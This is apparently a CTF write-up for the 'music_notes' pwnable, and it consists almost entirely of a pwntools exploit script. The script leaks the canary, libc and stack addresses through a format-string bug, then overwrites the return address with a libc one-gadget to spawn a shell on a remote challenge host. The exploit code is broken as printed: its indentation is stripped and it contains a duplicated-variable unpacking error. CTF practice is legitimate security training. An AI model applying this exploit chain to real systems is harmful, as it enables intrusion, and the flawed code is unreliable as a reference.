Tags: pwnables pwn format-string 

Rating: 5.0

We must answer the correct notes `D -> B -> A -> G -> D`, exploit a format string vuln to leak libc, then trigger a one gadget. We must also use the format string the leak the canary and then place it in the ROP chain so it stys intact, avoiding the SIGABRT

```python
#!/usr/bin/env python3

from pwn import *

elf = ELF("./music_notes_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.27.so")

context.binary = elf

context.log_level = "debug"

gs = '''
continue
'''

def conn():
if args.REMOTE:
r = remote("68.183.40.128", 30653)
else:
r = process([elf.path])
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
return r

def getNotes(): # handle the retreival of the notes
p.recvuntil(b"Choose note:")
Note1 = p.recvline()
Note2 = p.recvline()
return Note1, Note2

p = conn()

# D B A G D
Note1, Note1 = getNotes()
if b"D" in Note1:
p.sendline(b"1")
else:
p.sendline(b"2")

Note1, Note1 = getNotes()
if b"B" in Note1:
p.sendline(b"1")
else:
p.sendline(b"2")

Note1, Note1 = getNotes()
if b"A" in Note1:
p.sendline(b"1")
else:
p.sendline(b"2")
Note1, Note1 = getNotes()
if b"G" in Note1:
p.sendline(b"1")
else:
p.sendline(b"2")
Note1, Note1 = getNotes()

if b"D" in Note1:
p.sendline(b"1")
else:
p.sendline(b"2")

# get stack leak, canary, libc
p.sendlineafter(b"> ", b"%31$p %19$p %2$p %1$p")
p.recvuntil(b"[*] So, your name is: ")

canary = int(p.recv(18), 16)
elf_leak = int(p.recv(15).strip(), 16)
libc_leak = int(p.recv(15).strip(), 16)
stack_leak = int(p.recv(15).strip(), 16)

success(f"Leaked canary {hex(canary)}")
info(f"Leaked elf address {hex(elf_leak)}")
elf.address = elf_leak - elf.sym.sheet - 210
success(f"Leaked binary base {hex(elf.address)}")

info(f"Leaked libc address {hex(libc_leak)}")
libc.address = libc_leak - libc.sym["_IO_stdfile_1_lock"]
success(f"Leaked libc base {hex(libc.address)}")

info(f"Leaked stack address {hex(stack_leak)}")
rbp = stack_leak + 9936
success(f"Found rbp @ {hex(rbp)}")

warning(f"Address of sheet {hex(elf.sym.sheet)}")
pop_rdi = 0x0000000000001053
pop_rdi_pop_rbp = 0x0000000000022203
rop = ROP(libc)
binsh = next(libc.search(b"/bin/sh"))
#pop_rdi = rop.find_gadget(["pop rdi", "ret"])

rop.raw(p64(elf.sym.sheet))

payload1 = flat({40: p64(canary),
104-8: p64(rbp),
104: p64(0x4f432+libc.address)})

p.sendafter(b":", payload1)

#p.sendafter(b":", payload2)

p.interactive()
p.close()
```